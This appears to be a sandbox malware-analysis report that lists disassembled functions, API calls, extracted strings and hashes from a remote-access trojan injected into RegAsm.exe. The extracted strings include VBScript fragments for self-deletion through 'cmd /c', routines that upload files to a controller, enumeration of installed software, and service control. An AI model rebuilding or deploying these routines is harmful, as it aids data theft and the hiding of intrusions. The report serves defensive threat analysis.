                                                                                              • CloseHandle.KERNEL32 ref: 004138E3
                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00413905
                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041390F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                              • API String ID: 738084811-1354618412
                                                                                              • Opcode ID: d67d27fa0060385a4794320c5855a58ac25f5aec50818c958c2f69414fa05d2e
                                                                                              • Instruction ID: 7cc83dd66f58b781604f24274fbcbce06d703a4d5cc541ca1a03aa14c20c1d7d
                                                                                              • Opcode Fuzzy Hash: d67d27fa0060385a4794320c5855a58ac25f5aec50818c958c2f69414fa05d2e
                                                                                              • Instruction Fuzzy Hash: 5451D4B1A00108BFD705BB75DC96DBF3B6C9E41349B10413FF502A61D2EE785E49866E
                                                                                              Function 00408AD8 Relevance: 35.2, APIs: 6, Strings: 14, Instructions: 237registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040D18B: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                                • Part of subcall function 0040D18B: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                                • Part of subcall function 0040D18B: RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000,00000000,00000001), ref: 00408B30
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408B43
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000,00000000,00000001), ref: 00408B5F
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000,00000000,00000001), ref: 00408B8D
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408DB0
                                                                                              • ExitProcess.KERNEL32 ref: 00408DBC
                                                                                                • Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValuechar_traits
                                                                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                              • API String ID: 1918141659-2254097358
                                                                                              • Opcode ID: e5aedc4af4ec909da9e307105bef19887c62757110c28acaf90147901663c20f
                                                                                              • Instruction ID: d6e31582f6bbeec3731eba5083e5c30d2f4351ed3cef2ab9d9d1dbed254d7763
                                                                                              • Opcode Fuzzy Hash: e5aedc4af4ec909da9e307105bef19887c62757110c28acaf90147901663c20f
                                                                                              • Instruction Fuzzy Hash: 5A712B31A01208ABDB09EB61E9529EE7769AF50309B64407FB506771D2EF7C2E0EC65C
                                                                                              Function 00408817 Relevance: 35.2, APIs: 6, Strings: 14, Instructions: 216registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040D18B: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                                • Part of subcall function 0040D18B: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                                • Part of subcall function 0040D18B: RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.1.3 Light), ref: 00408880
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408893
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.1.3 Light), ref: 004088C5
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.1.3 Light), ref: 004088D3
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408ACA
                                                                                              • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValue
                                                                                              • String ID: ")$.vbs$5.1.3 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                              • API String ID: 1304132890-2661848401
                                                                                              • Opcode ID: c915d3d3cfd881888a9ba69b257a78b34908092fd65a9381916eff65d2380aa0
                                                                                              • Instruction ID: 4fffedc016be02ce2a268c02f2e0af6a6fdf237cd8678fb7a226089863e9ddbc
                                                                                              • Opcode Fuzzy Hash: c915d3d3cfd881888a9ba69b257a78b34908092fd65a9381916eff65d2380aa0
                                                                                              • Instruction Fuzzy Hash: B9613C31E00208ABCB09FB61E9529EE7769AF51305B64407FB506771D2EE7C2E0AC65C
                                                                                              Function 0044160D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                              • String ID:
                                                                                              • API String ID: 3899193279-0
                                                                                              • Opcode ID: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
                                                                                              • Instruction ID: 4237e6e7e157a4c7dbb0d807abf8b9af0d4306fdc3138cecd09bc7ccf606b428
                                                                                              • Opcode Fuzzy Hash: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
                                                                                              • Instruction Fuzzy Hash: BBD12AB1D047006FEB20AF758851B6F7BA4EF05354F0502AFF9599B3A1EB399880875D
                                                                                              Function 004144B6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,00000000,?), ref: 004144D3
                                                                                              • lstrlenW.KERNEL32(?), ref: 004144FB
                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00414522
                                                                                              • GetLastError.KERNEL32 ref: 00414530
                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 004145A6
                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 004145BF
                                                                                              • FindNextVolumeW.KERNEL32(00000018,?,00000104), ref: 004145D8
                                                                                              • FindVolumeClose.KERNEL32(00000018), ref: 00414618
                                                                                              • GetLastError.KERNEL32 ref: 0041462C
                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000105,00000105), ref: 0041465E
                                                                                              • lstrcatW.KERNEL32(?,?), ref: 00414676
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 00414684
                                                                                              • GetLastError.KERNEL32 ref: 0041468C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                                                                              • String ID: ?
                                                                                              • API String ID: 1756451316-1684325040
                                                                                              • Opcode ID: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
                                                                                              • Instruction ID: eb6b54062e2b08fb9c29ba80cfda5f6662be00940462f6bf9b60ec097b87ddd8
                                                                                              • Opcode Fuzzy Hash: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
                                                                                              • Instruction Fuzzy Hash: C051A375E00219ABCF209FA4DD48AEEB778FF99708F1044A6E509D3250E7788AC5CF59
                                                                                              Function 004434D7 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0044351B
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442730
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442742
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442754
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442766
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442778
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 0044278A
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 0044279C
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427AE
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427C0
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427D2
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427E4
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427F6
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442808
                                                                                              • _free.LIBCMT ref: 00443510
                                                                                                • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                                                                                • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                                                                              • _free.LIBCMT ref: 00443532
                                                                                              • _free.LIBCMT ref: 00443547
                                                                                              • _free.LIBCMT ref: 00443552
                                                                                              • _free.LIBCMT ref: 00443574
                                                                                              • _free.LIBCMT ref: 00443587
                                                                                              • _free.LIBCMT ref: 00443595
                                                                                              • _free.LIBCMT ref: 004435A0
                                                                                              • _free.LIBCMT ref: 004435D8
                                                                                              • _free.LIBCMT ref: 004435DF
                                                                                              • _free.LIBCMT ref: 004435FC
                                                                                              • _free.LIBCMT ref: 00443614
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID: pAF
                                                                                              • API String ID: 161543041-3714919331
                                                                                              • Opcode ID: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
                                                                                              • Instruction ID: 1e1acce580e4c44e89d7ce72c9cd794b27c1c651c1375113bcda4de26fb62da5
                                                                                              • Opcode Fuzzy Hash: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
                                                                                              • Instruction Fuzzy Hash: 45316B71A04201AFFB20AE3AD846B97B7E8EF04715F14541FF568D6251DB39AE408B58
                                                                                              Function 0040E783 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E7CF
                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040E815
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E82F
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 0040E83A
                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E877
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E889
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E894
                                                                                              • GetProcAddress.KERNEL32(00000000,0045EF50), ref: 0040E8A3
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E8BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                              • API String ID: 2490988753-744132762
                                                                                              • Opcode ID: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
                                                                                              • Instruction ID: e2fe4f89bec593c1194b96244b36457e88d8aa3fc30695666a9ebb8fa0cbd204
                                                                                              • Opcode Fuzzy Hash: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
                                                                                              • Instruction Fuzzy Hash: 6531D6B3D01218A7DB20AB62DC48A8F77ACAB05704F0049B7EC08B3241D7789E558BEC
                                                                                              Function 00442811 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID: pAF
                                                                                              • API String ID: 269201875-3714919331
                                                                                              • Opcode ID: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
                                                                                              • Instruction ID: 220afc4046d47a9c2269d4dee30ff000570bd1da0518462f48b073040ae84213
                                                                                              • Opcode Fuzzy Hash: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
                                                                                              • Instruction Fuzzy Hash: C7C13575D40604BFEB20DFA9CD42FEE77F8AB08744F54415AFA04FB282D6B4994187A4
                                                                                              Function 0043B1F8 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$Info
                                                                                              • String ID:
                                                                                              • API String ID: 2509303402-0
                                                                                              • Opcode ID: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
                                                                                              • Instruction ID: 233e507832ae68596296c544fe1e2f99e94559176b76bcc42a010ae489b1e6e1
                                                                                              • Opcode Fuzzy Hash: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
                                                                                              • Instruction Fuzzy Hash: FFB18F71900205AFDB11DF69C881BEEBBF5FF0C308F14506EEA59A7342D77998458BA8
                                                                                              Function 00406046 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00406180
                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 004061B6
                                                                                              • __aulldiv.LIBCMT ref: 004061E0
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004062E6
                                                                                              • ReadFile.KERNEL32(?,00000000,000186A0,?,00000000), ref: 00406301
                                                                                              • CloseHandle.KERNEL32(?), ref: 004063C4
                                                                                              • CloseHandle.KERNEL32(?,00000052), ref: 00406400
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040644F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $X|F
                                                                                              • API String ID: 3086580692-2448825271
                                                                                              • Opcode ID: 5176fbe0382892210aab2832f7f4a5d389b00c2f49130bdc7182920e901426ac
                                                                                              • Instruction ID: ce89fbc2bbcb9f21e0201713ae3f479a73954a728a6b624bb473e1a190b651a0
                                                                                              • Opcode Fuzzy Hash: 5176fbe0382892210aab2832f7f4a5d389b00c2f49130bdc7182920e901426ac
                                                                                              • Instruction Fuzzy Hash: 72B1CC31E00118ABCB08FBA5D9929EEB7B5AF44314F10812FF906762D1EF785E458B59
                                                                                              Function 00414A74 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00414A96
                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414D4A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00414D5E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumOpen
                                                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                              • API String ID: 1332880857-3714951968
                                                                                              • Opcode ID: 96ddb292e8695b7f36ce2576911f6231e0e3744c9051e2d6320e6382e22b49ad
                                                                                              • Instruction ID: c6cf66618c576b2a9970c100bb5541a486628a9123b9a16081024123d303fd20
                                                                                              • Opcode Fuzzy Hash: 96ddb292e8695b7f36ce2576911f6231e0e3744c9051e2d6320e6382e22b49ad
                                                                                              • Instruction Fuzzy Hash: B4815F719000189FDB19EB61DC52AEEB778AF54305F1041BFB50AB7192EF386F4ACA58
                                                                                              Function 00442C36 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 204COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID: <VF$<VF$@VF$pAF$tAF
                                                                                              • API String ID: 269201875-3149002956
                                                                                              • Opcode ID: 2ec2b8a0bf515df920bc32823d9815f97b99a28ca1dfd781462ff9c2964c34cf
                                                                                              • Instruction ID: c61609b52f92b179b45dad1ed7c922baca2b62edbd6b2c6063e6288bfe8cdad6
                                                                                              • Opcode Fuzzy Hash: 2ec2b8a0bf515df920bc32823d9815f97b99a28ca1dfd781462ff9c2964c34cf
                                                                                              • Instruction Fuzzy Hash: D961C171D00205AFEB20CF69C942B9ABBF5EF49310F64416BF944EB381E7B49D419B98
                                                                                              Function 0041322D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 66serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00412BE9,00000000), ref: 0041323C
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00412BE9,00000000), ref: 00413253
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413260
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412BE9,00000000), ref: 0041326F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413280
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413283
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID: +A
                                                                                              • API String ID: 221034970-2476349683
                                                                                              • Opcode ID: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
                                                                                              • Instruction ID: 17f09bffcb53596e9d4bf123afaf80ec38c88fef937fd9beb363d4db4ef8fd0f
                                                                                              • Opcode Fuzzy Hash: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
                                                                                              • Instruction Fuzzy Hash: E611E575D411187FD7206F649C89CFF3B6CDB4635AB00016AFA0593140DB784E4BAAF9
                                                                                              Function 00401C4F Relevance: 18.1, APIs: 12, Instructions: 60synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,00000000,00401AD4,00000000,?,?,?,?,00467C58), ref: 00401C59
                                                                                              • SetEvent.KERNEL32(?,?,00467C58), ref: 00401C68
                                                                                              • CloseHandle.KERNEL32(?,?,00467C58), ref: 00401C71
                                                                                              • closesocket.WS2_32(000000FF), ref: 00401C7F
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00467C58), ref: 00401CB6
                                                                                              • SetEvent.KERNEL32(?,?,00467C58), ref: 00401CCB
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00467C58), ref: 00401CD2
                                                                                              • SetEvent.KERNEL32(?,?,00467C58), ref: 00401CE7
                                                                                              • CloseHandle.KERNEL32(?,?,00467C58), ref: 00401CEC
                                                                                              • CloseHandle.KERNEL32(?,?,00467C58), ref: 00401CF1
                                                                                              • SetEvent.KERNEL32(?,?,00467C58), ref: 00401CFE
                                                                                              • CloseHandle.KERNEL32(?,?,00467C58), ref: 00401D03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                              • String ID:
                                                                                              • API String ID: 3658366068-0
                                                                                              • Opcode ID: 67213f11f0f14dc77f4e99e744ab60b7066ff55c34f1dff5ffc962fee311c99f
                                                                                              • Instruction ID: 647261f9900fe491da89cb5d5ae73573130af4b1a9831dc02a6027ad4db015cc
                                                                                              • Opcode Fuzzy Hash: 67213f11f0f14dc77f4e99e744ab60b7066ff55c34f1dff5ffc962fee311c99f
                                                                                              • Instruction Fuzzy Hash: EA213B31544B01AFD7316F21ED09B1ABBA2FF41326F104A6DE0E611AF0CB75E851DB58
                                                                                              Function 00408DE1 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040D18B: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                                • Part of subcall function 0040D18B: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                                • Part of subcall function 0040D18B: RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,00000000), ref: 00408E36
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408F95
                                                                                              • ExitProcess.KERNEL32 ref: 00408FA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExecuteExitFileModuleNameOpenProcessQueryShellValue
                                                                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                              • API String ID: 2135335499-2411266221
                                                                                              • Opcode ID: feee19f90c822f584134bc0ccec76dcda4c25d5825d796364cf455385b85a610
                                                                                              • Instruction ID: fa2d1577ff6c4dd0df342fc96389c47364483780c04f7bcf008f7b77c4008c2c
                                                                                              • Opcode Fuzzy Hash: feee19f90c822f584134bc0ccec76dcda4c25d5825d796364cf455385b85a610
                                                                                              • Instruction Fuzzy Hash: 7E413A31910118ABDB09FB61DC52DEE7729AF50305F14017FB506B70D2EE7C6E4ACA58
                                                                                              Function 0040900F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040915E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LongNamePath
                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                              • API String ID: 82841172-425784914
                                                                                              • Opcode ID: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
                                                                                              • Instruction ID: 593ac968e999b6fcb1afa8f523a49b2eed45a3e0272f2412b35337e24cb28c51
                                                                                              • Opcode Fuzzy Hash: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
                                                                                              • Instruction Fuzzy Hash: 69411E31901105AADB05FBA2ED578EE77789E60319B20403FB912761D3EF7C2F0D8659
                                                                                              Function 0043CC17 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,JnC,00436E4A,?,?,?,0043CE68,00000001,00000001,36E85006), ref: 0043CC71
